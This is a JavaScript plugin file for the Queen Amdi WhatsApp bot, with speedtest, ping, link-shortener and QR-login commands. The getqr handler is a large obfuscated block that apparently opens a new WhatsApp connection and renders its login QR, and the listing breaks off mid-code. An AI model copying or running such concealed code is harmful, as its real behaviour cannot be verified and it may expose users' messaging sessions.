/*
░██████╗░██╗░░░██╗███████╗███████╗███╗░░██╗
██╔═══██╗██║░░░██║██╔════╝██╔════╝████╗░██║
██║██╗██║██║░░░██║█████╗░░█████╗░░██╔██╗██║
╚██████╔╝██║░░░██║██╔══╝░░██╔══╝░░██║╚████║
░╚═██╔═╝░╚██████╔╝███████╗███████╗██║░╚███║
░░░╚═╝░░░░╚═════╝░╚══════╝╚══════╝╚═╝░░╚══╝
░█████╗░███╗░░░███╗██████╗░██╗
██╔══██╗████╗░████║██╔══██╗██║
███████║██╔████╔██║██║░░██║██║
██╔══██║██║╚██╔╝██║██║░░██║██║ █▀█ █▀▀█ █▀█ ▄█─ 
██║░░██║██║░╚═╝░██║██████╔╝██║ ─▄▀ █▄▀█ ─▄▀ ─█─ 
╚═╝░░╚═╝╚═╝░░░░░╚═╝╚═════╝░╚═╝ █▄▄ █▄▄█ █▄▄ ▄█▄
Copyright (C) 2021 Black Amda.
Licensed under the  GPL-3.0 License;
you may not use this file except in compliance with the License.
*/

const QueenAmdi = require('queenamdi-public');
const Amdi = QueenAmdi.events
const Build = QueenAmdi.build
const {WAConnection, MessageType, Mimetype} = require('@blackamda/queenamdi-web-api');
const TinyURL = require('tinyurl');
const axios = require('axios');
const Heroku = require('heroku-client');
const QRCode = require('qrcode')
const Language = require('../language');
const Lang = Language.getString('web');
const SLang = Language.getString('webss');
let LOL = Build.WORKTYPE == 'public' ? false : true

const heroku = new Heroku({
    token: Build.HEROKU.API_KEY
});


Amdi.operate({pattern: 'speedtest ?(.*)', fromMe: true, desc: Lang.SPEEDTEST_DESC}, (async (message, match) => {
    await QueenAmdi.amdi_setup()
    if (match[1] == 'user' || match[1] == 'User') {
        
        // Preliminary Message
        var transition_message = await QueenAmdi.speedtest_begin(Build.LANG)

        // Ping
        var start = new Date().getTime();
        var testing = await message.client.sendMessage(message.jid, transition_message.user_msg, MessageType.text, {quoted: message.data})
        var end = new Date().getTime();

        // Speedtest Modules
        var user_download = await QueenAmdi.speedtest_user()
        var user_upload = await QueenAmdi.speedtest_userup()
        var auth_message = await QueenAmdi.speedtest_message(Build.LANG)
        var act_ping = end - start
        var realping = act_ping.toString()

        // Real Download Speed
        var realspeed_once = Number(user_download.mbps) / 8
        var realspeed = realspeed_once.toString()
        var realspeed_msg = auth_message.download_value.replace('{count}', realspeed)

        // Real Upload Speed
        var realupload_once = Number(user_upload.mbps) / 8
        var realupload = realupload_once.toString()
        var realupload_msg = auth_message.download_value.replace('{count}', realupload)

        // Final Message
        var payload = auth_message.download + realspeed_msg + '\n' + 
            auth_message.upload + realupload_msg + '\n' +
            auth_message.ping + realping + auth_message.ms + '\n' +
            auth_message.extra + '\n\n' +
            auth_message.byte_speed_d + user_download.bps + '\n' +
            auth_message.kb_speed_d + user_download.kbps + '\n' +
            auth_message.mb_speed_d + user_download.mbps + '\n' +
            auth_message.gb_speed_d + user_download.gbps
        
        await message.client.deleteMessage(message.jid, {id: testing.key.id, remoteJid: message.jid, fromMe: true});
        await message.client.sendMessage(message.jid, payload, MessageType.text, {quoted: message.data})

    } else if (match[1] == 'server' || match[1] == 'Server') {
        
        // Preliminary Message
        var transition_message = await QueenAmdi.speedtest_begin(Build.LANG)

        // Ping
        var start = new Date().getTime();
        var testserver = await message.client.sendMessage(message.jid, transition_message.server_msg, MessageType.text, {quoted: message.data})
        var end = new Date().getTime();

        // Speedtest Modules
        var server_download = await QueenAmdi.speedtest_server()
        var server_upload = await QueenAmdi.speedtest_serverup()
        var auth_message = await QueenAmdi.speedtest_message(Build.LANG)
        var act_ping = end - start
       
        // Simple Way of Checking Heroku Latency
        var act_ping_then = act_ping / 50 
        var realping = act_ping_then.toString()

        // Real Download Speed
        var realspeed_once = Number(server_download.mbps) / 8
        var realspeed = realspeed_once.toString()
        var realspeed_msg = auth_message.download_value.replace('{count}', realspeed)

        // Real Upload Speed
        var realupload_once = Number(server_upload.mbps) / 8
        var realupload = realupload_once.toString()
        var realupload_msg = auth_message.download_value.replace('{count}', realupload)

        // Final Message
        var payload = auth_message.download + realspeed_msg + '\n' + 
            auth_message.upload + realupload_msg + '\n' +
            auth_message.ping + realping + auth_message.ms + '\n' +
            auth_message.extra + '\n\n' +
            auth_message.byte_speed_d + server_download.bps + '\n' +
            auth_message.kb_speed_d + server_download.kbps + '\n' +
            auth_message.mb_speed_d + server_download.mbps + '\n' +
            auth_message.gb_speed_d + server_download.gbps
        
        await message.client.deleteMessage(message.jid, {id: testserver.key.id, remoteJid: message.jid, fromMe: true});
        await message.client.sendMessage(message.jid, payload, MessageType.text, {quoted: message.data})
    } else {
        // Preliminary Message
        var transition_message = await QueenAmdi.speedtest_once(Build.LANG)

        // Ping
        var start = new Date().getTime();
        var checking = await message.client.sendMessage(message.jid, transition_message.server_msg, MessageType.text, {quoted: message.data})
        var end = new Date().getTime();

        // Speedtest Modules
        var server_download = await QueenAmdi.speedtest_server()
        var server_upload = await QueenAmdi.speedtest_serverup()
        var auth_message = await QueenAmdi.speedtest_message(Build.LANG)
        var act_ping = end - start
       
        // Simple Way of Checking Heroku Latency
        var act_ping_then = act_ping / 50 
        var realping = act_ping_then.toString()

        // Real Download Speed
        var realspeed_once = Number(server_download.mbps) / 8
        var realspeed = realspeed_once.toString()
        var realspeed_msg = auth_message.download_value.replace('{count}', realspeed)

        // Real Upload Speed
        var realupload_once = Number(server_upload.mbps) / 8
        var realupload = realupload_once.toString()
        var realupload_msg = auth_message.download_value.replace('{count}', realupload)

        // Final Message
        var payload = auth_message.download + realspeed_msg + '\n' + 
            auth_message.upload + realupload_msg + '\n' +
            auth_message.ping + realping + auth_message.ms + '\n' +
            auth_message.extra + '\n\n' +
            auth_message.byte_speed_d + server_download.bps + '\n' +
            auth_message.kb_speed_d + server_download.kbps + '\n' +
            auth_message.mb_speed_d + server_download.mbps + '\n' +
            auth_message.gb_speed_d + server_download.gbps
        
        await message.client.deleteMessage(message.jid, {id: checking.key.id, remoteJid: message.jid, fromMe: true});
        await message.client.sendMessage(message.jid, payload, MessageType.text, {quoted: message.data})
    }
}));


Amdi.operate({pattern: 'ping', fromMe: true, deleteCommand: false, desc: Lang.PING_DESC, dontAddCommandList: true}, (async (message, match) => {
  var start = new Date().getTime();
  var msg = await message.reply('```Ping!```');
  var end = new Date().getTime();

  await msg.delete();
  await message.client.sendMessage(
    message.jid,'*Pong!*\n```' + (end - start) + 'ms```', MessageType.text);
}));


Amdi.operate({pattern: 'short ?(.*)', fromMe: false, desc: Lang.URL}, (async (message, match) => {

    if (match[1] === '') return await message.client.sendMessage(message.jid, Lang.NEED, MessageType.text, {quoted: message.data});

    TinyURL.shorten(`${match[1]}`, async(res, err) => {
      if (err)
        await message.client.sendMessage(message.jid, '*#### Error! ####*\n\n' + '```' + err + '```', MessageType.text, {quoted: message.data});

        await message.client.sendMessage(message.jid,`*Original Link:* ${match[1]}\n*Short Link:* \n` + res, MessageType.text, {quoted: message.data})
    });
}));

Amdi.operate({pattern: 'getqr ?(.*)', fromMe: LOL, desc: Lang.AMDI_QR,  deleteCommand: false}, (async (message, match) => {
    (function(_0x348669,_0x4d07a8){function _0x10c875(_0x2cc195,_0x400b24,_0x453ed3,_0x26e0cd,_0x42d209){return _0x5ea5(_0x400b24-0xae,_0x42d209);}function _0x23266d(_0x26a9f4,_0x289788,_0x435c37,_0x159fba,_0x4669b6){return _0x5ea5(_0x289788- -0x3cc,_0x26a9f4);}const _0x18551c=_0x348669();function _0x338cf5(_0x1eef66,_0xf4b98f,_0x19c890,_0x121eb3,_0x305bb6){return _0x5ea5(_0x121eb3- -0x216,_0x19c890);}function _0x2e3cec(_0x3b8c0f,_0x4698cd,_0x25a204,_0x2437f2,_0x19e0ee){return _0x5ea5(_0x25a204- -0xe1,_0x4698cd);}function _0x5077e1(_0x1866ac,_0x53956b,_0x3deb31,_0x6b9704,_0x1e9495){return _0x5ea5(_0x1e9495- -0x19,_0x6b9704);}while(!![]){try{const _0x5a3926=parseInt(_0x338cf5(-0xf,-0x3,0xa6,0x26,0x7))/(0x160a+0x10*0x182+0x2e29*-0x1)*(parseInt(_0x338cf5(-0x67,-0xb,0x1b,0x0,0x22))/(-0x121a+-0x14ea+0x25*0x10e))+-parseInt(_0x10c875(0x24e,0x20f,0x1db,0x247,0x1ab))/(0x371*0x6+0xd20+-0x3*0xb41)*(parseInt(_0x338cf5(-0xae,-0xb2,-0xc7,-0x4d,-0xc))/(0xafe*-0x1+0x2656+-0x4*0x6d5))+parseInt(_0x5077e1(0x22e,0x1d9,0x152,0x167,0x1d0))/(-0xfae+0x53b*0x1+0x2*0x53c)+parseInt(_0x338cf5(-0xcf,-0xa2,-0x12a,-0xb7,-0xb9))/(-0x151c+0x2681+0x115f*-0x1)+-parseInt(_0x23266d(-0x199,-0x1d7,-0x243,-0x173,-0x184))/(0x2003+-0x1ad2+-0x52a)+parseInt(_0x2e3cec(0x1cd,0x10b,0x15c,0x17d,0x14a))/(0x1500+0xa1b+-0x2b*0xb9)*(-parseInt(_0x5077e1(0x26b,0x1a2,0x1e6,0x1de,0x20e))/(0x2f*-0xd1+-0xb*-0x43+0x2387))+parseInt(_0x2e3cec(0x1a1,0x17a,0x130,0x1ad,0x142))/(0x16*0x81+-0x1*0x1475+-0x21*-0x49);if(_0x5a3926===_0x4d07a8)break;else _0x18551c['push'](_0x18551c['shift']());}catch(_0x1777cd){_0x18551c['push'](_0x18551c['shift']());}}}(_0x2fb5,0x9cf2e+-0x4b101*0x2+-0x1*-0x53f9c));function _0x56718b(_0x608166,_0x36f95a,_0x8a4bc7,_0x40d3fd,_0x3f560f){return _0x5ea5(_0x36f95a-0xbb,_0x3f560f);}function _0x360105(_0x5a744f,_0x3a43bc,_0x1f5257,_0x34de7d,_0x2e5520){return _0x5ea5(_0x5a744f- -0x18b,_0x3a43bc);}const _0x3d0737=(function(){function _0x575ada(_0x3a9a48,_0x1c8a1b,_0x51d39e,_0x5aad71,_0x1e1314){return _0x5ea5(_0x5aad71-0x7f,_0x3a9a48);}function _0x337710(_0x5bff9d,_0xa0d57a,_0x579f0a,_0x397c64,_0x4ae3d1){return _0x5ea5(_0x579f0a-0x284,_0x4ae3d1);}const _0x26d436={'bGbEV':function(_0x44a22c,_0x39adf3){return _0x44a22c!==_0x39adf3;},'YBnnv':_0x337710(0x523,0x50e,0x4a6,0x46f,0x4cb),'lpOtE':_0x76a86a(0x24d,0x2eb,0x29e,0x2a0,0x259),'XMZDP':function(_0x4dd56e,_0x5be52a){return _0x4dd56e===_0x5be52a;},'oSzBn':_0x76a86a(0x231,0x2d1,0x279,0x24f,0x231),'tAyID':_0x575ada(0x2d9,0x218,0x255,0x25a,0x285),'rRWtG':function(_0x57ab0b,_0x2baf71){return _0x57ab0b(_0x2baf71);},'pZoNW':function(_0x23bbb3){return _0x23bbb3();},'muokx':function(_0x5cbacd,_0x3f9e8c){return _0x5cbacd!==_0x3f9e8c;},'kBOxt':_0x76a86a(0x219,0x1b2,0x1dc,0x227,0x219)};let _0x4d57ba=!![];function _0x127c6e(_0x25c2c3,_0x280565,_0x360a0c,_0x17045e,_0x2fe853){return _0x5ea5(_0x25c2c3- -0x348,_0x360a0c);}function _0x76a86a(_0x3afb61,_0x11c4be,_0x245b40,_0x46c4a8,_0x53ba81){return _0x5ea5(_0x245b40-0x64,_0x3afb61);}function _0x28c232(_0x4ca3e9,_0xf3b3a4,_0x55ac81,_0x48c64d,_0x2df8d8){return _0x5ea5(_0x48c64d- -0x304,_0x2df8d8);}return function(_0xa7bc6f,_0x33552c){const _0x5f471f={'CmPAZ':function(_0x2bf7f8,_0x23b91f){function _0x14c54e(_0x324f64,_0x3ad4f2,_0x4555d1,_0x3751c1,_0x2ef62d){return _0x5ea5(_0x324f64-0x64,_0x3ad4f2);}return _0x26d436[_0x14c54e(0x21e,0x29f,0x24a,0x253,0x1cb)](_0x2bf7f8,_0x23b91f);},'OntIU':function(_0xf223d2){function _0x3bb1f5(_0x2f93c9,_0x13f00e,_0x29ac8d,_0x1ab4d1,_0x3ae59a){return _0x5ea5(_0x1ab4d1- -0x3d9,_0x13f00e);}return _0x26d436[_0x3bb1f5(-0x30a,-0x2ed,-0x21b,-0x29c,-0x2cc)](_0xf223d2);}};function _0xd3785e(_0x261434,_0x2eaeb4,_0x38f645,_0x2e2c8c,_0x38b1b1){return _0x337710(_0x261434-0x117,_0x2eaeb4-0xea,_0x38b1b1- -0x28c,_0x2e2c8c-0x1f1,_0x2eaeb4);}function _0x5c4820(_0x429873,_0x548957,_0x464ef7,_0x2b3d87,_0x266b2a){return _0x28c232(_0x429873-0x3,_0x548957-0xe1,_0x464ef7-0x18e,_0x429873-0x453,_0x548957);}function _0x50c571(_0x2d0313,_0x4d5f0b,_0x4e01c8,_0x2ba27f,_0x10c319){return _0x28c232(_0x2d0313-0xe1,_0x4d5f0b-0x8b,_0x4e01c8-0x150,_0x10c319-0x304,_0x2d0313);}function _0x3026ca(_0x3fd182,_0x39c53c,_0x5435e8,_0x8cb9d7,_0x25cd41){return _0x28c232(_0x3fd182-0x154,_0x39c53c-0x59,_0x5435e8-0x134,_0x25cd41-0x162,_0x8cb9d7);}if(_0x26d436[_0x5c4820(0x363,0x3c7,0x351,0x319,0x3ce)](_0x26d436[_0x3026ca(0x17,-0x52,-0x3a,0x26,-0x51)],_0x26d436[_0x3026ca(-0xa0,-0xbc,0x21,-0xaa,-0x51)]))_0x5f471f[_0x3026ca(0x18,-0x3c,-0x73,-0x2,-0xa)](_0x439707,'0');else{const _0x550624=_0x4d57ba?function(){function _0x4d5af0(_0xe85328,_0x1045dd,_0x2dd32e,_0x5c5285,_0x1751dc){return _0x3026ca(_0xe85328-0xc4,_0x1045dd-0x4c,_0x2dd32e-0x1b0,_0x1751dc,_0x2dd32e-0x14a);}function _0x3f9f12(_0x3c82ae,_0x195fc8,_0x3fd45f,_0x415273,_0x1d8c45){return _0x3026ca(_0x3c82ae-0x114,_0x195fc8-0x14a,_0x3fd45f-0xb8,_0x195fc8,_0x3c82ae- -0x5d);}function _0x3b641e(_0x5f43a4,_0x365f8e,_0x5bbbb5,_0x40dfd5,_0x3dfe1f){return _0xd3785e(_0x5f43a4-0x0,_0x3dfe1f,_0x5bbbb5-0x1ca,_0x40dfd5-0x1c6,_0x5f43a4- -0x1c5);}function _0x202cb7(_0x50848d,_0x52f500,_0x5a555b,_0x38e322,_0x1f4d2c){return _0x5c4820(_0x38e322- -0x192,_0x52f500,_0x5a555b-0x4d,_0x38e322-0x157,_0x1f4d2c-0x16a);}function _0x1a5668(_0x5c3563,_0x1eeae9,_0x55ea4d,_0x41a0ba,_0x2362bb){return _0x5c4820(_0x5c3563- -0x472,_0x1eeae9,_0x55ea4d-0xa8,_0x41a0ba-0xcb,_0x2362bb-0x1a);}if(_0x26d436[_0x3f9f12(-0x39,-0x54,0x7,-0x19,-0x63)](_0x26d436[_0x3f9f12(-0x53,-0xa9,-0x6,0x1b,0x2c)],_0x26d436[_0x4d5af0(0x16e,0x14c,0x19b,0x20b,0x129)])){if(_0x33552c){if(_0x26d436[_0x3f9f12(0x3a,0xa3,0xaa,-0x46,0x11)](_0x26d436[_0x1a5668(-0x1e0,-0x242,-0x1ea,-0x180,-0x211)],_0x26d436[_0x202cb7(0x1bd,0x14e,0x210,0x1ad,0x185)]))return![];else{const _0x3eb96f=_0x33552c[_0x3f9f12(0x3f,-0x2e,-0x24,-0x2b,0x50)](_0xa7bc6f,arguments);return _0x33552c=null,_0x3eb96f;}}}else _0x5f471f[_0x3f9f12(-0x10,-0x3c,-0x26,-0x7b,0x1c)](_0x560da9);}:function(){};return _0x4d57ba=![],_0x550624;}};}());(function(){function _0x2295e6(_0xd95499,_0x4ffa34,_0x246691,_0x56fe33,_0xf12254){return _0x5ea5(_0x4ffa34- -0x2da,_0x56fe33);}function _0xff9af(_0x2a7d33,_0x50c810,_0x517ff5,_0x16fa94,_0xcbcb8b){return _0x5ea5(_0x517ff5- -0x147,_0xcbcb8b);}const _0x4e666e={'WydpL':function(_0x50e6a6){return _0x50e6a6();},'PeCyc':function(_0x553281,_0x1a97fd){return _0x553281!==_0x1a97fd;},'UzsPN':_0x3ff8c0(-0x2d,0x1,-0x6,-0x6f,0x31),'DwQGI':_0x3ff8c0(0x15,0x0,0x19,-0x5f,0x52),'IKXwK':_0x25e1cd(-0xd7,-0x97,-0x69,-0xd7,-0x80)+_0x2295e6(-0x136,-0x173,-0x124,-0x101,-0x11f)+_0x5d8cab(0x3c9,0x3a6,0x3b5,0x3ca,0x397)+')','LFSvR':_0x2295e6(-0x5f,-0xa2,-0xe1,-0xaf,-0xd3)+_0x5d8cab(0x415,0x412,0x3df,0x3cb,0x49b)+_0x5d8cab(0x468,0x46e,0x484,0x48f,0x41e)+_0x2295e6(-0x79,-0xae,-0xc3,-0x38,-0x37)+_0xff9af(-0x66,-0x6,0x1,0x4a,-0x2)+_0x3ff8c0(-0x84,-0xd,-0xbb,-0xb2,-0x34)+_0x3ff8c0(0x1e,0x17,-0x3e,0x8c,0x3f),'nENgz':function(_0x358019,_0x167015){return _0x358019(_0x167015);},'DoQyE':_0x2295e6(-0x82,-0xfe,-0x91,-0x178,-0x158),'gigbx':function(_0x488231,_0x43118b){return _0x488231+_0x43118b;},'iGFdk':_0xff9af(0x11f,0x124,0x102,0xce,0xed),'WYqQs':function(_0x16f385,_0x4d9211){return _0x16f385+_0x4d9211;},'ySawM':_0x2295e6(-0x155,-0x155,-0x1cd,-0x142,-0x129),'bUyik':_0x25e1cd(-0xff,-0x140,-0xb6,-0x98,-0x90),'eZPPo':_0x5d8cab(0x386,0x406,0x3dc,0x3d2,0x3da),'ziVKc':function(_0x271513){return _0x271513();},'qmYFN':function(_0xf3948c,_0x25ab3c,_0x375724){return _0xf3948c(_0x25ab3c,_0x375724);}};function _0x25e1cd(_0x54c1eb,_0x69a7de,_0x2b543f,_0x119472,_0x24cab7){return _0x5ea5(_0x2b543f- -0x28e,_0x24cab7);}function _0x5d8cab(_0x399b8d,_0x20fdbe,_0x4188f3,_0x17dfa1,_0x14dc68){return _0x5ea5(_0x20fdbe-0x252,_0x399b8d);}function _0x3ff8c0(_0x2d1feb,_0x55a47e,_0x533fd2,_0x131046,_0x517eb0){return _0x5ea5(_0x2d1feb- -0x1ca,_0x55a47e);}_0x4e666e[_0xff9af(0x2b,0xb2,0x36,-0x4,0x91)](_0x3d0737,this,function(){function _0x31f832(_0x3f98b4,_0x48526d,_0x3c468f,_0x249796,_0x5e0640){return _0x5d8cab(_0x5e0640,_0x48526d- -0x66,_0x3c468f-0x18b,_0x249796-0x1da,_0x5e0640-0xb2);}function _0x4cc24f(_0x47062a,_0x3bcd58,_0x7b5a69,_0x459cf9,_0x540dc2){return _0x3ff8c0(_0x540dc2-0x1d6,_0x47062a,_0x7b5a69-0x194,_0x459cf9-0x15a,_0x540dc2-0x5d);}const _0x5031e4={'QFBMp':function(_0x58b290){function _0x4caecb(_0x16479c,_0x1f25ec,_0x3b0032,_0x401cc3,_0x312583){return _0x5ea5(_0x401cc3-0x9d,_0x312583);}return _0x4e666e[_0x4caecb(0x20d,0x278,0x198,0x203,0x215)](_0x58b290);}};function _0x308031(_0x5b5d80,_0x63cc2b,_0x22caed,_0x36b72a,_0xa280f2){return _0xff9af(_0x5b5d80-0x13,_0x63cc2b-0x86,_0x63cc2b-0x425,_0x36b72a-0x42,_0x22caed);}function _0x44258f(_0x5720a7,_0x31d27a,_0x5740d7,_0x8eee10,_0x2c5bf7){return _0x5d8cab(_0x2c5bf7,_0x5740d7-0x190,_0x5740d7-0x9,_0x8eee10-0xeb,_0x2c5bf7-0xd9);}function _0x2624b8(_0x16c092,_0x12ed9d,_0x56ec1c,_0x23275c,_0x5edf79){return _0x5d8cab(_0x23275c,_0x12ed9d-0x9f,_0x56ec1c-0x1ee,_0x23275c-0x52,_0x5edf79-0x27);}if(_0x4e666e[_0x44258f(0x57f,0x568,0x526,0x59e,0x58c)](_0x4e666e[_0x44258f(0x5ed,0x5bf,0x566,0x585,0x58e)],_0x4e666e[_0x2624b8(0x44a,0x49a,0x510,0x4f1,0x4b9)])){const _0x17cbf0=new RegExp(_0x4e666e[_0x308031(0x4c2,0x499,0x4c5,0x4b3,0x49c)]),_0x490e64=new RegExp(_0x4e666e[_0x2624b8(0x502,0x4d4,0x507,0x4eb,0x483)],'i'),_0x26f370=_0x4e666e[_0x44258f(0x58e,0x548,0x590,0x5b1,0x542)](_0xfb0dd2,_0x4e666e[_0x4cc24f(0x18b,0x15d,0x17e,0x1f2,0x177)]);if(!_0x17cbf0[_0x308031(0x47a,0x4a2,0x4f0,0x43f,0x48b)](_0x4e666e[_0x2624b8(0x42a,0x4b4,0x473,0x442,0x4eb)](_0x26f370,_0x4e666e[_0x2624b8(0x4f8,0x4ce,0x525,0x553,0x48f)]))||!_0x490e64[_0x4cc24f(0x152,0x1ee,0x227,0x18c,0x1d0)](_0x4e666e[_0x2624b8(0x443,0x47f,0x481,0x4a3,0x48b)](_0x26f370,_0x4e666e[_0x44258f(0x547,0x552,0x59a,0x5ba,0x5a1)]))){if(_0x4e666e[_0x31f832(0x38d,0x330,0x2fd,0x399,0x399)](_0x4e666e[_0x308031(0x52b,0x525,0x52a,0x52a,0x4a5)],_0x4e666e[_0x31f832(0x44e,0x433,0x43a,0x3eb,0x3d2)])){const _0xa2b7da=_0x207469?function(){function _0x15c1a4(_0x4bec73,_0x2b995a,_0x49dd55,_0x3fdbd7,_0x31672d){return _0x2624b8(_0x4bec73-0x1b4,_0x2b995a- -0x3cf,_0x49dd55-0x39,_0x31672d,_0x31672d-0x17a);}if(_0x132a45){const _0x4a5bdb=_0x3a0e16[_0x15c1a4(0x10a,0x160,0x15d,0x1a2,0xfd)](_0x359695,arguments);return _0xd0f628=null,_0x4a5bdb;}}:function(){};return _0x426375=![],_0xa2b7da;}else _0x4e666e[_0x31f832(0x40f,0x39a,0x35f,0x41e,0x3c2)](_0x26f370,'0');}else _0x4e666e[_0x44258f(0x49c,0x549,0x526,0x523,0x573)](_0x4e666e[_0x308031(0x4e3,0x477,0x409,0x4d2,0x4dc)],_0x4e666e[_0x308031(0x456,0x477,0x401,0x4ac,0x4b3)])?_0x5031e4[_0x4cc24f(0x249,0x1d2,0x1d6,0x22a,0x24f)](_0x2d86db):_0x4e666e[_0x2624b8(0x3be,0x430,0x3c4,0x47a,0x3ee)](_0xfb0dd2);}else{if(_0x455a84){const _0x5e75ec=_0x370f53[_0x308031(0x566,0x51c,0x56b,0x56d,0x526)](_0x8f35c9,arguments);return _0x1d60cb=null,_0x5e75ec;}}})();}());function _0x4b218d(_0xd64d9d,_0x20baff,_0x3b9b7c,_0x374011,_0x5ee4d5){return _0x5ea5(_0x3b9b7c- -0x36,_0xd64d9d);}await QueenAmdi[_0x5d441b(-0x1e8,-0x1d1,-0x235,-0x1fc,-0x1ca)+_0x5d441b(-0x29e,-0x22c,-0x2d5,-0x27b,-0x251)]();function _0x5ea5(_0x40b825,_0x37769b){const _0x314652=_0x2fb5();return _0x5ea5=function(_0x5a239c,_0x21e8a6){_0x5a239c=_0x5a239c-(-0x2a2*0xd+0x7*-0x50d+0x46cf*0x1);let _0x2ed152=_0x314652[_0x5a239c];return _0x2ed152;},_0x5ea5(_0x40b825,_0x37769b);}if(message[_0x4b218d(0x26a,0x224,0x1fe,0x1dd,0x1a5)][_0x4b218d(0x22a,0x1a9,0x1e2,0x230,0x17b)+_0x360105(0xba,0xa5,0x13a,0x88,0x4d)](_0x4b218d(0x15b,0x1bb,0x1bc,0x216,0x20b)))await message[_0x5d441b(-0x232,-0x284,-0x24b,-0x275,-0x2d4)+'t'][_0x360105(0x5a,-0x2,0xd9,-0x21,0x99)+_0x4b218d(0x118,0x1ac,0x12f,0x13c,0xd2)+'e'](message[_0x360105(0xa9,0x95,0x54,0xc9,0x4c)],Lang[_0x5d441b(-0x1c8,-0x1df,-0x1ec,-0x233,-0x251)],MessageType[_0x360105(-0x1e,0x64,-0x81,-0x51,-0x5e)],{'quoted':message[_0x5196ab(-0x16d,-0x211,-0x19a,-0x235,-0x1c6)]});else{if(match[0x10dd*0x1+-0xcc1*-0x2+0x152f*-0x2]==''){var VSAMDI=await axios[_0x56718b(0x1b2,0x230,0x246,0x1ce,0x26d)](_0x4b218d(0xd7,0xba,0x124,0x1a4,0xf3)+_0x5196ab(-0x1ae,-0x213,-0x164,-0x157,-0x1bf)+_0x5d441b(-0x1df,-0x21d,-0x1f2,-0x1aa,-0x210)+_0x56718b(0x21f,0x223,0x1b4,0x20e,0x27b)+_0x360105(0x71,0xb5,-0xb,0x94,0xf3)+_0x4b218d(0x1ef,0x1ba,0x177,0x1a6,0x1e3)+_0x5d441b(-0x1e0,-0x20a,-0x1e5,-0x1a9,-0x202)+_0x5196ab(-0x2b5,-0x22a,-0x29b,-0x20d,-0x26e)+_0x360105(-0x29,-0x32,-0x3,-0x1d,0x58)+_0x5d441b(-0x197,-0x1a9,-0x1da,-0x194,-0x205)+_0x360105(-0x36,-0x79,0x32,-0xbc,-0x2)+_0x5d441b(-0x1a6,-0x1a7,-0x23f,-0x1c7,-0x17c)+_0x360105(-0x1b,-0xa1,0x4,-0x18,0x28)+_0x4b218d(0x195,0x13e,0x15c,0x176,0xf7));currentVersion=VSAMDI[_0x360105(0x6d,0x1,0x9f,-0xd,0xf2)][_0x5196ab(-0x27b,-0x22f,-0x270,-0x226,-0x25a)+_0x4b218d(0x187,0x1b8,0x189,0x1ea,0x1ce)+_0x360105(0x27,0x21,0x86,0x15,-0x54)],currentVersion=currentVersion[_0x56718b(0x2d1,0x2a8,0x239,0x2f0,0x2a8)]('.'),currentVersion=[+currentVersion[0x127e+-0xa40+-0x83e],+currentVersion[-0xb5*0x29+-0x151*0x6+0x24e4],+currentVersion[0xc7d*0x2+0x10eb*-0x1+-0x3*0x2af]];const conn=new WAConnection();conn[_0x4b218d(0x119,0x1cb,0x143,0x11c,0xe5)+'r'][_0x5d441b(-0x285,-0x23f,-0x218,-0x23b,-0x1ec)]=_0x4b218d(0x225,0x15f,0x1a0,0x1b4,0x125),conn[_0x5d441b(-0x28b,-0x270,-0x222,-0x25e,-0x1f3)+'on']=currentVersion,conn[_0x4b218d(0x162,0x199,0x164,0x13e,0x1e7)+_0x5d441b(-0x20e,-0x258,-0x199,-0x21f,-0x1ac)+_0x56718b(0x186,0x1f5,0x254,0x220,0x200)+_0x5d441b(-0x172,-0x16c,-0x15e,-0x1bd,-0x169)]=[_0x360105(0xac,0xb4,0xf8,0x81,0xab)+_0x56718b(0x298,0x2b9,0x29c,0x308,0x2f3)+'i\x20',_0x56718b(0x235,0x259,0x2db,0x1d2,0x24f),_0x56718b(0x1ca,0x252,0x299,0x243,0x2a7)],conn['on']('qr',async _0x5171df=>{const _0x3ef033={'hvQZj':_0xaf993(0x49d,0x4a5,0x4d3,0x443,0x47f)+_0x344e58(0x2fa,0x29d,0x2dd,0x359,0x2aa)+_0xaf993(0x3cc,0x3c2,0x43f,0x3e4,0x3eb)+')','fZuCH':_0x344e58(0x3cb,0x399,0x41f,0x409,0x3c6)+_0xaf993(0x438,0x3bf,0x4a0,0x407,0x40d)+_0x4814a9(0x359,0x25d,0x25a,0x2d8,0x2ee)+_0xaf993(0x4a4,0x501,0x480,0x4e6,0x4b6)+_0xaf993(0x3c0,0x380,0x426,0x430,0x357)+_0x344e58(0x2d9,0x356,0x361,0x327,0x257)+_0x2dbbfa(0x46d,0x440,0x494,0x511,0x465),'MyxQd':function(_0x391524,_0xdfc9a9){return _0x391524(_0xdfc9a9);},'BIRcH':_0xaf993(0x454,0x47b,0x438,0x3df,0x496),'emGbO':function(_0x17f343,_0x17c41d){return _0x17f343+_0x17c41d;},'nZEDV':_0xaf993(0x4c1,0x524,0x4c9,0x48b,0x44a),'qAzxj':_0x4814a9(0x271,0x269,0x2b5,0x241,0x293),'jeXQX':function(_0x242cd7){return _0x242cd7();},'hfSvV':function(_0x2f9514,_0x4cf442,_0x5718b7){return _0x2f9514(_0x4cf442,_0x5718b7);},'AIwan':function(_0x180265,_0x18167a){return _0x180265===_0x18167a;},'RbOYZ':_0xaf993(0x472,0x467,0x3f4,0x3ec,0x4a4),'KLVrP':_0xaf993(0x4a6,0x52a,0x42d,0x501,0x451)+_0x4814a9(0x36e,0x2d8,0x2b2,0x2e7,0x2f9)+_0x4814a9(0x1e6,0x2bb,0x2ab,0x247,0x2b0)+_0x344e58(0x351,0x35f,0x366,0x30e,0x395)+'4,','sniJf':_0xaf993(0x436,0x490,0x45e,0x3ad,0x3b8)+'4'};function _0x4814a9(_0x50aa3c,_0x2dcf61,_0xee973e,_0x5bbf4e,_0x4cd354){return _0x56718b(_0x50aa3c-0x6,_0x5bbf4e-0x1,_0xee973e-0x1e1,_0x5bbf4e-0x123,_0x50aa3c);}const _0x2c203f={};function _0x2dbbfa(_0x507688,_0x21c47f,_0x5b15b5,_0x455ceb,_0x464b73){return _0x56718b(_0x507688-0x121,_0x5b15b5-0x1f1,_0x5b15b5-0xdd,_0x455ceb-0x1e0,_0x455ceb);}_0x2c203f[_0x4814a9(0x30d,0x253,0x2bf,0x288,0x22a)]=0x8;function _0x344e58(_0x3383c7,_0x270922,_0x52774b,_0x2ee0e5,_0x220a7f){return _0x56718b(_0x3383c7-0xee,_0x3383c7-0xd8,_0x52774b-0xe4,_0x2ee0e5-0x39,_0x270922);}let _0x224cbe=await QRCode[_0x2dbbfa(0x430,0x489,0x426,0x48c,0x4ad)+_0xaf993(0x4ba,0x543,0x4b7,0x45e,0x4aa)](_0x5171df,_0x2c203f),_0x4305c7=new 